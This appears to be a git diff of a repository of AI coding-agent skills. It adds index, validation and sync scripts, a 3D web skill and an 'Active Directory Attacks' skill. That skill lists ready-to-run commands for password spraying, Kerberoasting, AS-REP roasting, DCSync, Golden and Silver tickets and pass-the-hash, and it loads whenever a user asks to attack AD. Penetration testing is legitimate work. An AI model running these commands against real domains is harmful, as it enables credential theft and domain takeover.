- **[zebbern/claude-code-guide](https://github.com/zebbern/claude-code-guide)**: Comprehensive Security suite (Ethical Hacking, OWASP, AWS Auditing).
|
||||
- **[alirezarezvani/claude-skills](https://github.com/alirezarezvani/claude-skills)**: Senior Engineering roles, Product Management toolkit, Content Creator & ASO skills.
|
||||
- **[obra/superpowers](https://github.com/obra/superpowers)**: The original "Superpowers" by Jesse Vincent.
|
||||
- **[guanyang/antigravity-skills](https://github.com/guanyang/antigravity-skills)**: Core Antigravity extensions.
|
||||
- **[diet103/claude-code-infrastructure-showcase](https://github.com/diet103/claude-code-infrastructure-showcase)**: Infrastructure and Backend/Frontend Guidelines.
|
||||
- **[ChrisWiles/claude-code-showcase](https://github.com/ChrisWiles/claude-code-showcase)**: React UI patterns and Design Systems.
|
||||
- **[travisvn/awesome-claude-skills](https://github.com/travisvn/awesome-claude-skills)**: Loki Mode and Playwright integration.
|
||||
- **[zebbern/claude-code-guide](https://github.com/zebbern/claude-code-guide)**: Comprehensive Security suite & Guide (Source for ~60 new skills).
|
||||
- **[alirezarezvani/claude-skills](https://github.com/alirezarezvani/claude-skills)**: Senior Engineering and PM toolkit.
|
||||
- **[karanb192/awesome-claude-skills](https://github.com/karanb192/awesome-claude-skills)**: A massive list of verified skills for Claude Code.
|
||||
- **[zircote/.claude](https://github.com/zircote/.claude)**: Shopify development skill reference.
|
||||
|
||||
### Inspirations
|
||||
|
||||
- **[f/awesome-chatgpt-prompts](https://github.com/f/awesome-chatgpt-prompts)**: Inspiration for the Prompt Library.
|
||||
- **[leonardomso/33-js-concepts](https://github.com/leonardomso/33-js-concepts)**: Inspiration for JavaScript Mastery.
|
||||
|
||||
---
|
||||
|
||||
## 🛡️ License
|
||||
## License
|
||||
|
||||
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
|
||||
Individual skills may retain the licenses of their original repositories.
|
||||
MIT License. See [LICENSE](LICENSE) for details.
|
||||
|
||||
---
|
||||
|
||||
**Keywords**: Claude Code, Antigravity, Agentic Skills, MCT, Model Context Protocol, AI Agents, Autonomous Coding, Prompt Engineering, Security Auditing, React Patterns, Microservices.
|
||||
**Keywords**: Claude Code, Gemini CLI, Codex CLI, Antigravity IDE, GitHub Copilot, Cursor, OpenCode, Agentic Skills, AI Coding Assistant, AI Agent Skills, MCP, MCT, AI Agents, Autonomous Coding, Security Auditing, React Patterns, LLM Tools, AI IDE, Coding AI, AI Pair Programming, Vibe Coding, Agentic Coding, AI Developer Tools.
|
||||
|
||||
---
|
||||
|
||||
## 🏷️ GitHub Topics
|
||||
|
||||
For repository maintainers, add these topics to maximize discoverability:
|
||||
|
||||
```text
|
||||
claude-code, gemini-cli, codex-cli, antigravity, cursor, github-copilot, opencode,
|
||||
agentic-skills, ai-coding, llm-tools, ai-agents, autonomous-coding, mcp,
|
||||
ai-developer-tools, ai-pair-programming, vibe-coding, skill, skills, SKILL.md, rules.md, CLAUDE.md, GEMINI.md, CURSOR.md
|
||||
claude-code, gemini-cli, codex-cli, antigravity, cursor, github-copilot, opencode,
|
||||
agentic-skills, ai-coding, llm-tools, ai-agents, autonomous-coding, mcp
|
||||
```
|
||||
|
||||
72
scripts/generate_index.py
Normal file
72
scripts/generate_index.py
Normal file
@@ -0,0 +1,72 @@
|
||||
import os
|
||||
import json
|
||||
import re
|
||||
|
||||
def generate_index(skills_dir, output_file):
|
||||
print(f"🏗️ Generating index from: {skills_dir}")
|
||||
skills = []
|
||||
|
||||
for root, dirs, files in os.walk(skills_dir):
|
||||
if "SKILL.md" in files:
|
||||
skill_path = os.path.join(root, "SKILL.md")
|
||||
dir_name = os.path.basename(root)
|
||||
|
||||
skill_info = {
|
||||
"id": dir_name,
|
||||
"path": os.path.relpath(root, os.path.dirname(skills_dir)),
|
||||
"name": dir_name.replace("-", " ").title(),
|
||||
"description": ""
|
||||
}
|
||||
|
||||
with open(skill_path, 'r', encoding='utf-8') as f:
|
||||
content = f.read()
|
||||
|
||||
# Try to extract from frontmatter first
|
||||
fm_match = re.search(r'^---\s*(.*?)\s*---', content, re.DOTALL)
|
||||
if fm_match:
|
||||
fm_content = fm_match.group(1)
|
||||
name_fm = re.search(r'^name:\s*(.+)$', fm_content, re.MULTILINE)
|
||||
desc_fm = re.search(r'^description:\s*(.+)$', fm_content, re.MULTILINE)
|
||||
|
||||
if name_fm:
|
||||
skill_info["name"] = name_fm.group(1).strip()
|
||||
if desc_fm:
|
||||
skill_info["description"] = desc_fm.group(1).strip()
|
||||
|
||||
# Fallback to Header and First Paragraph if needed
|
||||
if not skill_info["description"] or skill_info["description"] == "":
|
||||
name_match = re.search(r'^#\s+(.+)$', content, re.MULTILINE)
|
||||
if name_match and not fm_match: # Only override if no frontmatter name
|
||||
skill_info["name"] = name_match.group(1).strip()
|
||||
|
||||
# Extract first paragraph
|
||||
body = content
|
||||
if fm_match:
|
||||
body = content[fm_match.end():].strip()
|
||||
|
||||
lines = body.split('\n')
|
||||
desc_lines = []
|
||||
for line in lines:
|
||||
if line.startswith('#') or not line.strip():
|
||||
if desc_lines: break
|
||||
continue
|
||||
desc_lines.append(line.strip())
|
||||
|
||||
if desc_lines:
|
||||
skill_info["description"] = " ".join(desc_lines)[:150] + "..."
|
||||
|
||||
skills.append(skill_info)
|
||||
|
||||
skills.sort(key=lambda x: x["name"])
|
||||
|
||||
with open(output_file, 'w', encoding='utf-8') as f:
|
||||
json.dump(skills, f, indent=2)
|
||||
|
||||
print(f"✅ Generated index with {len(skills)} skills at: {output_file}")
|
||||
return skills
|
||||
|
||||
if __name__ == "__main__":
|
||||
base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
|
||||
skills_path = os.path.join(base_dir, "skills")
|
||||
output_path = os.path.join(base_dir, "skills_index.json")
|
||||
generate_index(skills_path, output_path)
|
||||
119
scripts/skills_manager.py
Executable file
119
scripts/skills_manager.py
Executable file
@@ -0,0 +1,119 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Skills Manager - Easily enable/disable skills locally
|
||||
|
||||
Usage:
|
||||
python3 scripts/skills_manager.py list # List active skills
|
||||
python3 scripts/skills_manager.py disabled # List disabled skills
|
||||
python3 scripts/skills_manager.py enable SKILL # Enable a skill
|
||||
python3 scripts/skills_manager.py disable SKILL # Disable a skill
|
||||
"""
|
||||
|
||||
import sys
|
||||
import os
|
||||
from pathlib import Path
|
||||
|
||||
SKILLS_DIR = Path(__file__).parent.parent / "skills"
|
||||
DISABLED_DIR = SKILLS_DIR / ".disabled"
|
||||
|
||||
def list_active():
|
||||
"""List all active skills"""
|
||||
print("🟢 Active Skills:\n")
|
||||
skills = sorted([d.name for d in SKILLS_DIR.iterdir()
|
||||
if d.is_dir() and not d.name.startswith('.')])
|
||||
symlinks = sorted([s.name for s in SKILLS_DIR.iterdir()
|
||||
if s.is_symlink()])
|
||||
|
||||
for skill in skills:
|
||||
print(f" • {skill}")
|
||||
|
||||
if symlinks:
|
||||
print("\n📎 Symlinks:")
|
||||
for link in symlinks:
|
||||
target = os.readlink(SKILLS_DIR / link)
|
||||
print(f" • {link} → {target}")
|
||||
|
||||
print(f"\n✅ Total: {len(skills)} skills + {len(symlinks)} symlinks")
|
||||
|
||||
def list_disabled():
|
||||
"""List all disabled skills"""
|
||||
if not DISABLED_DIR.exists():
|
||||
print("❌ No disabled skills directory found")
|
||||
return
|
||||
|
||||
print("⚪ Disabled Skills:\n")
|
||||
disabled = sorted([d.name for d in DISABLED_DIR.iterdir() if d.is_dir()])
|
||||
|
||||
for skill in disabled:
|
||||
print(f" • {skill}")
|
||||
|
||||
print(f"\n📊 Total: {len(disabled)} disabled skills")
|
||||
|
||||
def enable_skill(skill_name):
|
||||
"""Enable a disabled skill"""
|
||||
source = DISABLED_DIR / skill_name
|
||||
target = SKILLS_DIR / skill_name
|
||||
|
||||
if not source.exists():
|
||||
print(f"❌ Skill '{skill_name}' not found in .disabled/")
|
||||
return False
|
||||
|
||||
if target.exists():
|
||||
print(f"⚠️ Skill '{skill_name}' is already active")
|
||||
return False
|
||||
|
||||
source.rename(target)
|
||||
print(f"✅ Enabled: {skill_name}")
|
||||
return True
|
||||
|
||||
def disable_skill(skill_name):
|
||||
"""Disable an active skill"""
|
||||
source = SKILLS_DIR / skill_name
|
||||
target = DISABLED_DIR / skill_name
|
||||
|
||||
if not source.exists():
|
||||
print(f"❌ Skill '{skill_name}' not found")
|
||||
return False
|
||||
|
||||
if source.name.startswith('.'):
|
||||
print(f"⚠️ Cannot disable system directory: {skill_name}")
|
||||
return False
|
||||
|
||||
if source.is_symlink():
|
||||
print(f"⚠️ Cannot disable symlink: {skill_name}")
|
||||
print(f" (Remove the symlink manually if needed)")
|
||||
return False
|
||||
|
||||
DISABLED_DIR.mkdir(exist_ok=True)
|
||||
source.rename(target)
|
||||
print(f"✅ Disabled: {skill_name}")
|
||||
return True
|
||||
|
||||
def main():
|
||||
if len(sys.argv) < 2:
|
||||
print(__doc__)
|
||||
sys.exit(1)
|
||||
|
||||
command = sys.argv[1].lower()
|
||||
|
||||
if command == "list":
|
||||
list_active()
|
||||
elif command == "disabled":
|
||||
list_disabled()
|
||||
elif command == "enable":
|
||||
if len(sys.argv) < 3:
|
||||
print("❌ Usage: skills_manager.py enable SKILL_NAME")
|
||||
sys.exit(1)
|
||||
enable_skill(sys.argv[2])
|
||||
elif command == "disable":
|
||||
if len(sys.argv) < 3:
|
||||
print("❌ Usage: skills_manager.py disable SKILL_NAME")
|
||||
sys.exit(1)
|
||||
disable_skill(sys.argv[2])
|
||||
else:
|
||||
print(f"❌ Unknown command: {command}")
|
||||
print(__doc__)
|
||||
sys.exit(1)
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
114
scripts/sync_recommended_skills.sh
Executable file
114
scripts/sync_recommended_skills.sh
Executable file
@@ -0,0 +1,114 @@
|
||||
#!/bin/bash
|
||||
# sync_recommended_skills.sh
|
||||
# Syncs only the 35 recommended skills from GitHub repo to local central library
|
||||
|
||||
set -e
|
||||
|
||||
# Paths
|
||||
GITHUB_REPO="/Users/nicco/Antigravity Projects/antigravity-awesome-skills/skills"
|
||||
LOCAL_LIBRARY="/Users/nicco/.gemini/antigravity/scratch/.agent/skills"
|
||||
BACKUP_DIR="/Users/nicco/.gemini/antigravity/scratch/.agent/skills_backup_$(date +%Y%m%d_%H%M%S)"
|
||||
|
||||
# 35 Recommended Skills
|
||||
RECOMMENDED_SKILLS=(
|
||||
# Tier S - Core Development (13)
|
||||
"systematic-debugging"
|
||||
"test-driven-development"
|
||||
"writing-skills"
|
||||
"doc-coauthoring"
|
||||
"planning-with-files"
|
||||
"concise-planning"
|
||||
"software-architecture"
|
||||
"senior-architect"
|
||||
"senior-fullstack"
|
||||
"verification-before-completion"
|
||||
"git-pushing"
|
||||
"address-github-comments"
|
||||
"javascript-mastery"
|
||||
|
||||
# Tier A - Your Projects (12)
|
||||
"docx-official"
|
||||
"pdf-official"
|
||||
"pptx-official"
|
||||
"xlsx-official"
|
||||
"react-best-practices"
|
||||
"web-design-guidelines"
|
||||
"frontend-dev-guidelines"
|
||||
"webapp-testing"
|
||||
"playwright-skill"
|
||||
"mcp-builder"
|
||||
"notebooklm"
|
||||
"ui-ux-pro-max"
|
||||
|
||||
# Marketing & SEO (1)
|
||||
"content-creator"
|
||||
|
||||
# Corporate (4)
|
||||
"brand-guidelines-anthropic"
|
||||
"brand-guidelines-community"
|
||||
"internal-comms-anthropic"
|
||||
"internal-comms-community"
|
||||
|
||||
# Planning & Documentation (1)
|
||||
"writing-plans"
|
||||
|
||||
# AI & Automation (5)
|
||||
"workflow-automation"
|
||||
"llm-app-patterns"
|
||||
"autonomous-agent-patterns"
|
||||
"prompt-library"
|
||||
"github-workflow-automation"
|
||||
)
|
||||
|
||||
echo "🔄 Sync Recommended Skills"
|
||||
echo "========================="
|
||||
echo ""
|
||||
echo "📍 Source: $GITHUB_REPO"
|
||||
echo "📍 Target: $LOCAL_LIBRARY"
|
||||
echo "📊 Skills to sync: ${#RECOMMENDED_SKILLS[@]}"
|
||||
echo ""
|
||||
|
||||
# Create backup
|
||||
echo "📦 Creating backup at: $BACKUP_DIR"
|
||||
cp -r "$LOCAL_LIBRARY" "$BACKUP_DIR"
|
||||
echo "✅ Backup created"
|
||||
echo ""
|
||||
|
||||
# Clear local library (keep README.md if exists)
|
||||
echo "🗑️ Clearing local library..."
|
||||
cd "$LOCAL_LIBRARY"
|
||||
for item in */; do
|
||||
rm -rf "$item"
|
||||
done
|
||||
echo "✅ Local library cleared"
|
||||
echo ""
|
||||
|
||||
# Copy recommended skills
|
||||
echo "📋 Copying recommended skills..."
|
||||
SUCCESS_COUNT=0
|
||||
MISSING_COUNT=0
|
||||
|
||||
for skill in "${RECOMMENDED_SKILLS[@]}"; do
|
||||
if [ -d "$GITHUB_REPO/$skill" ]; then
|
||||
cp -r "$GITHUB_REPO/$skill" "$LOCAL_LIBRARY/"
|
||||
echo " ✅ $skill"
|
||||
((SUCCESS_COUNT++))
|
||||
else
|
||||
echo " ⚠️ $skill (not found in repo)"
|
||||
((MISSING_COUNT++))
|
||||
fi
|
||||
done
|
||||
|
||||
echo ""
|
||||
echo "📊 Summary"
|
||||
echo "=========="
|
||||
echo "✅ Copied: $SUCCESS_COUNT skills"
|
||||
echo "⚠️ Missing: $MISSING_COUNT skills"
|
||||
echo "📦 Backup: $BACKUP_DIR"
|
||||
echo ""
|
||||
|
||||
# Verify
|
||||
FINAL_COUNT=$(find "$LOCAL_LIBRARY" -maxdepth 1 -type d ! -name "." | wc -l | tr -d ' ')
|
||||
echo "🎯 Final count in local library: $FINAL_COUNT skills"
|
||||
echo ""
|
||||
echo "Done! Your local library now has only the recommended skills."
|
||||
50
scripts/validate_skills.py
Normal file
50
scripts/validate_skills.py
Normal file
@@ -0,0 +1,50 @@
|
||||
import os
|
||||
import re
|
||||
|
||||
def validate_skills(skills_dir):
|
||||
print(f"🔍 Validating skills in: {skills_dir}")
|
||||
errors = []
|
||||
skill_count = 0
|
||||
|
||||
for root, dirs, files in os.walk(skills_dir):
|
||||
if "SKILL.md" in files:
|
||||
skill_count += 1
|
||||
skill_path = os.path.join(root, "SKILL.md")
|
||||
rel_path = os.path.relpath(skill_path, skills_dir)
|
||||
|
||||
with open(skill_path, 'r', encoding='utf-8') as f:
|
||||
content = f.read()
|
||||
|
||||
# Check for Frontmatter or Header
|
||||
has_frontmatter = content.strip().startswith("---")
|
||||
has_header = re.search(r'^#\s+', content, re.MULTILINE)
|
||||
|
||||
if not (has_frontmatter or has_header):
|
||||
errors.append(f"❌ {rel_path}: Missing frontmatter or top-level heading")
|
||||
|
||||
if has_frontmatter:
|
||||
# Basic check for name and description in frontmatter
|
||||
fm_match = re.search(r'^---\s*(.*?)\s*---', content, re.DOTALL)
|
||||
if fm_match:
|
||||
fm_content = fm_match.group(1)
|
||||
if "name:" not in fm_content:
|
||||
errors.append(f"⚠️ {rel_path}: Frontmatter missing 'name:'")
|
||||
if "description:" not in fm_content:
|
||||
errors.append(f"⚠️ {rel_path}: Frontmatter missing 'description:'")
|
||||
else:
|
||||
errors.append(f"❌ {rel_path}: Malformed frontmatter")
|
||||
|
||||
print(f"✅ Found and checked {skill_count} skills.")
|
||||
if errors:
|
||||
print("\n⚠️ Validation Results:")
|
||||
for err in errors:
|
||||
print(err)
|
||||
return False
|
||||
else:
|
||||
print("✨ All skills passed basic validation!")
|
||||
return True
|
||||
|
||||
if __name__ == "__main__":
|
||||
base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
|
||||
skills_path = os.path.join(base_dir, "skills")
|
||||
validate_skills(skills_path)
|
||||
3
skills/.gitignore
vendored
Normal file
3
skills/.gitignore
vendored
Normal file
@@ -0,0 +1,3 @@
|
||||
# Local-only: disabled skills for lean configuration
|
||||
# These skills are kept in the repository but disabled locally
|
||||
.disabled/
|
||||
254
skills/3d-web-experience/SKILL.md
Normal file
254
skills/3d-web-experience/SKILL.md
Normal file
@@ -0,0 +1,254 @@
|
||||
---
|
||||
name: 3d-web-experience
|
||||
description: "Expert in building 3D experiences for the web - Three.js, React Three Fiber, Spline, WebGL, and interactive 3D scenes. Covers product configurators, 3D portfolios, immersive websites, and bringing depth to web experiences. Use when: 3D website, three.js, WebGL, react three fiber, 3D experience."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# 3D Web Experience
|
||||
|
||||
**Role**: 3D Web Experience Architect
|
||||
|
||||
You bring the third dimension to the web. You know when 3D enhances
|
||||
and when it's just showing off. You balance visual impact with
|
||||
performance. You make 3D accessible to users who've never touched
|
||||
a 3D app. You create moments of wonder without sacrificing usability.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Three.js implementation
|
||||
- React Three Fiber
|
||||
- WebGL optimization
|
||||
- 3D model integration
|
||||
- Spline workflows
|
||||
- 3D product configurators
|
||||
- Interactive 3D scenes
|
||||
- 3D performance optimization
|
||||
|
||||
## Patterns
|
||||
|
||||
### 3D Stack Selection
|
||||
|
||||
Choosing the right 3D approach
|
||||
|
||||
**When to use**: When starting a 3D web project
|
||||
|
||||
```python
|
||||
## 3D Stack Selection
|
||||
|
||||
### Options Comparison
|
||||
| Tool | Best For | Learning Curve | Control |
|
||||
|------|----------|----------------|---------|
|
||||
| Spline | Quick prototypes, designers | Low | Medium |
|
||||
| React Three Fiber | React apps, complex scenes | Medium | High |
|
||||
| Three.js vanilla | Max control, non-React | High | Maximum |
|
||||
| Babylon.js | Games, heavy 3D | High | Maximum |
|
||||
|
||||
### Decision Tree
|
||||
```
|
||||
Need quick 3D element?
|
||||
└── Yes → Spline
|
||||
└── No → Continue
|
||||
|
||||
Using React?
|
||||
└── Yes → React Three Fiber
|
||||
└── No → Continue
|
||||
|
||||
Need max performance/control?
|
||||
└── Yes → Three.js vanilla
|
||||
└── No → Spline or R3F
|
||||
```
|
||||
|
||||
### Spline (Fastest Start)
|
||||
```jsx
|
||||
import Spline from '@splinetool/react-spline';
|
||||
|
||||
export default function Scene() {
|
||||
return (
|
||||
<Spline scene="https://prod.spline.design/xxx/scene.splinecode" />
|
||||
);
|
||||
}
|
||||
```
|
||||
|
||||
### React Three Fiber
|
||||
```jsx
|
||||
import { Canvas } from '@react-three/fiber';
|
||||
import { OrbitControls, useGLTF } from '@react-three/drei';
|
||||
|
||||
function Model() {
|
||||
const { scene } = useGLTF('/model.glb');
|
||||
return <primitive object={scene} />;
|
||||
}
|
||||
|
||||
export default function Scene() {
|
||||
return (
|
||||
<Canvas>
|
||||
<ambientLight />
|
||||
<Model />
|
||||
<OrbitControls />
|
||||
</Canvas>
|
||||
);
|
||||
}
|
||||
```
|
||||
```
|
||||
|
||||
### 3D Model Pipeline
|
||||
|
||||
Getting models web-ready
|
||||
|
||||
**When to use**: When preparing 3D assets
|
||||
|
||||
```python
|
||||
## 3D Model Pipeline
|
||||
|
||||
### Format Selection
|
||||
| Format | Use Case | Size |
|
||||
|--------|----------|------|
|
||||
| GLB/GLTF | Standard web 3D | Smallest |
|
||||
| FBX | From 3D software | Large |
|
||||
| OBJ | Simple meshes | Medium |
|
||||
| USDZ | Apple AR | Medium |
|
||||
|
||||
### Optimization Pipeline
|
||||
```
|
||||
1. Model in Blender/etc
|
||||
2. Reduce poly count (< 100K for web)
|
||||
3. Bake textures (combine materials)
|
||||
4. Export as GLB
|
||||
5. Compress with gltf-transform
|
||||
6. Test file size (< 5MB ideal)
|
||||
```
|
||||
|
||||
### GLTF Compression
|
||||
```bash
|
||||
# Install gltf-transform
|
||||
npm install -g @gltf-transform/cli
|
||||
|
||||
# Compress model
|
||||
gltf-transform optimize input.glb output.glb \
|
||||
--compress draco \
|
||||
--texture-compress webp
|
||||
```
|
||||
|
||||
### Loading in R3F
|
||||
```jsx
|
||||
import { useGLTF, useProgress, Html } from '@react-three/drei';
|
||||
import { Suspense } from 'react';
|
||||
|
||||
function Loader() {
|
||||
const { progress } = useProgress();
|
||||
return <Html center>{progress.toFixed(0)}%</Html>;
|
||||
}
|
||||
|
||||
export default function Scene() {
|
||||
return (
|
||||
<Canvas>
|
||||
<Suspense fallback={<Loader />}>
|
||||
<Model />
|
||||
</Suspense>
|
||||
</Canvas>
|
||||
);
|
||||
}
|
||||
```
|
||||
```
|
||||
|
||||
### Scroll-Driven 3D
|
||||
|
||||
3D that responds to scroll
|
||||
|
||||
**When to use**: When integrating 3D with scroll
|
||||
|
||||
```python
|
||||
## Scroll-Driven 3D
|
||||
|
||||
### R3F + Scroll Controls
|
||||
```jsx
|
||||
import { ScrollControls, useScroll } from '@react-three/drei';
|
||||
import { useFrame } from '@react-three/fiber';
|
||||
|
||||
function RotatingModel() {
|
||||
const scroll = useScroll();
|
||||
const ref = useRef();
|
||||
|
||||
useFrame(() => {
|
||||
// Rotate based on scroll position
|
||||
ref.current.rotation.y = scroll.offset * Math.PI * 2;
|
||||
});
|
||||
|
||||
return <mesh ref={ref}>...</mesh>;
|
||||
}
|
||||
|
||||
export default function Scene() {
|
||||
return (
|
||||
<Canvas>
|
||||
<ScrollControls pages={3}>
|
||||
<RotatingModel />
|
||||
</ScrollControls>
|
||||
</Canvas>
|
||||
);
|
||||
}
|
||||
```
|
||||
|
||||
### GSAP + Three.js
|
||||
```javascript
|
||||
import gsap from 'gsap';
|
||||
import ScrollTrigger from 'gsap/ScrollTrigger';
|
||||
|
||||
gsap.to(camera.position, {
|
||||
scrollTrigger: {
|
||||
trigger: '.section',
|
||||
scrub: true,
|
||||
},
|
||||
z: 5,
|
||||
y: 2,
|
||||
});
|
||||
```
|
||||
|
||||
### Common Scroll Effects
|
||||
- Camera movement through scene
|
||||
- Model rotation on scroll
|
||||
- Reveal/hide elements
|
||||
- Color/material changes
|
||||
- Exploded view animations
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ 3D For 3D's Sake
|
||||
|
||||
**Why bad**: Slows down the site.
|
||||
Confuses users.
|
||||
Battery drain on mobile.
|
||||
Doesn't help conversion.
|
||||
|
||||
**Instead**: 3D should serve a purpose.
|
||||
Product visualization = good.
|
||||
Random floating shapes = probably not.
|
||||
Ask: would an image work?
|
||||
|
||||
### ❌ Desktop-Only 3D
|
||||
|
||||
**Why bad**: Most traffic is mobile.
|
||||
Kills battery.
|
||||
Crashes on low-end devices.
|
||||
Frustrated users.
|
||||
|
||||
**Instead**: Test on real mobile devices.
|
||||
Reduce quality on mobile.
|
||||
Provide static fallback.
|
||||
Consider disabling 3D on low-end.
|
||||
|
||||
### ❌ No Loading State
|
||||
|
||||
**Why bad**: Users think it's broken.
|
||||
High bounce rate.
|
||||
3D takes time to load.
|
||||
Bad first impression.
|
||||
|
||||
**Instead**: Loading progress indicator.
|
||||
Skeleton/placeholder.
|
||||
Load 3D after page is interactive.
|
||||
Optimize model size.
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `scroll-experience`, `interactive-portfolio`, `frontend`, `landing-page-design`
|
||||
380
skills/active-directory-attacks/SKILL.md
Normal file
380
skills/active-directory-attacks/SKILL.md
Normal file
@@ -0,0 +1,380 @@
|
||||
---
|
||||
name: Active Directory Attacks
|
||||
description: This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing.
|
||||
---
|
||||
|
||||
# Active Directory Attacks
|
||||
|
||||
## Purpose
|
||||
|
||||
Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.
|
||||
|
||||
## Inputs/Prerequisites
|
||||
|
||||
- Kali Linux or Windows attack platform
|
||||
- Domain user credentials (for most attacks)
|
||||
- Network access to Domain Controller
|
||||
- Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec
|
||||
|
||||
## Outputs/Deliverables
|
||||
|
||||
- Domain enumeration data
|
||||
- Extracted credentials and hashes
|
||||
- Kerberos tickets for impersonation
|
||||
- Domain Administrator access
|
||||
- Persistent access mechanisms
|
||||
|
||||
---
|
||||
|
||||
## Essential Tools
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| BloodHound | AD attack path visualization |
|
||||
| Impacket | Python AD attack tools |
|
||||
| Mimikatz | Credential extraction |
|
||||
| Rubeus | Kerberos attacks |
|
||||
| CrackMapExec | Network exploitation |
|
||||
| PowerView | AD enumeration |
|
||||
| Responder | LLMNR/NBT-NS poisoning |
|
||||
|
||||
---
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### Step 1: Kerberos Clock Sync
|
||||
|
||||
Kerberos requires clock synchronization (±5 minutes):
|
||||
|
||||
```bash
|
||||
# Detect clock skew
|
||||
nmap -sT 10.10.10.10 -p445 --script smb2-time
|
||||
|
||||
# Fix clock on Linux
|
||||
sudo date -s "14 APR 2024 18:25:16"
|
||||
|
||||
# Fix clock on Windows
|
||||
net time /domain /set
|
||||
|
||||
# Fake clock without changing system time
|
||||
faketime -f '+8h' <command>
|
||||
```
|
||||
|
||||
### Step 2: AD Reconnaissance with BloodHound
|
||||
|
||||
```bash
|
||||
# Start BloodHound
|
||||
neo4j console
|
||||
bloodhound --no-sandbox
|
||||
|
||||
# Collect data with SharpHound
|
||||
.\SharpHound.exe -c All
|
||||
.\SharpHound.exe -c All --ldapusername user --ldappassword pass
|
||||
|
||||
# Python collector (from Linux)
|
||||
bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all
|
||||
```
|
||||
|
||||
### Step 3: PowerView Enumeration
|
||||
|
||||
```powershell
|
||||
# Get domain info
|
||||
Get-NetDomain
|
||||
Get-DomainSID
|
||||
Get-NetDomainController
|
||||
|
||||
# Enumerate users
|
||||
Get-NetUser
|
||||
Get-NetUser -SamAccountName targetuser
|
||||
Get-UserProperty -Properties pwdlastset
|
||||
|
||||
# Enumerate groups
|
||||
Get-NetGroupMember -GroupName "Domain Admins"
|
||||
Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member
|
||||
|
||||
# Find local admin access
|
||||
Find-LocalAdminAccess -Verbose
|
||||
|
||||
# User hunting
|
||||
Invoke-UserHunter
|
||||
Invoke-UserHunter -Stealth
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Credential Attacks
|
||||
|
||||
### Password Spraying
|
||||
|
||||
```bash
|
||||
# Using kerbrute
|
||||
./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123
|
||||
|
||||
# Using CrackMapExec
|
||||
crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success
|
||||
```
|
||||
|
||||
### Kerberoasting
|
||||
|
||||
Extract service account TGS tickets and crack offline:
|
||||
|
||||
```bash
|
||||
# Impacket
|
||||
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt
|
||||
|
||||
# Rubeus
|
||||
.\Rubeus.exe kerberoast /outfile:hashes.txt
|
||||
|
||||
# CrackMapExec
|
||||
crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt
|
||||
|
||||
# Crack with hashcat
|
||||
hashcat -m 13100 hashes.txt rockyou.txt
|
||||
```
|
||||
|
||||
### AS-REP Roasting
|
||||
|
||||
Target accounts with "Do not require Kerberos preauthentication":
|
||||
|
||||
```bash
|
||||
# Impacket
|
||||
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat
|
||||
|
||||
# Rubeus
|
||||
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
|
||||
|
||||
# Crack with hashcat
|
||||
hashcat -m 18200 hashes.txt rockyou.txt
|
||||
```
|
||||
|
||||
### DCSync Attack
|
||||
|
||||
Extract credentials directly from DC (requires Replicating Directory Changes rights):
|
||||
|
||||
```bash
|
||||
# Impacket
|
||||
secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt
|
||||
|
||||
# Mimikatz
|
||||
lsadump::dcsync /domain:domain.local /user:krbtgt
|
||||
lsadump::dcsync /domain:domain.local /user:Administrator
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Kerberos Ticket Attacks
|
||||
|
||||
### Pass-the-Ticket (Golden Ticket)
|
||||
|
||||
Forge TGT with krbtgt hash for any user:
|
||||
|
||||
```powershell
|
||||
# Get krbtgt hash via DCSync first
|
||||
# Mimikatz - Create Golden Ticket
|
||||
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt
|
||||
|
||||
# Impacket
|
||||
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator
|
||||
export KRB5CCNAME=Administrator.ccache
|
||||
psexec.py -k -no-pass domain.local/Administrator@dc.domain.local
|
||||
```
|
||||
|
||||
### Silver Ticket
|
||||
|
||||
Forge TGS for specific service:
|
||||
|
||||
```powershell
|
||||
# Mimikatz
|
||||
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt
|
||||
```
|
||||
|
||||
### Pass-the-Hash
|
||||
|
||||
```bash
|
||||
# Impacket
|
||||
psexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
|
||||
wmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
|
||||
smbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
|
||||
|
||||
# CrackMapExec
|
||||
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local
|
||||
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth
|
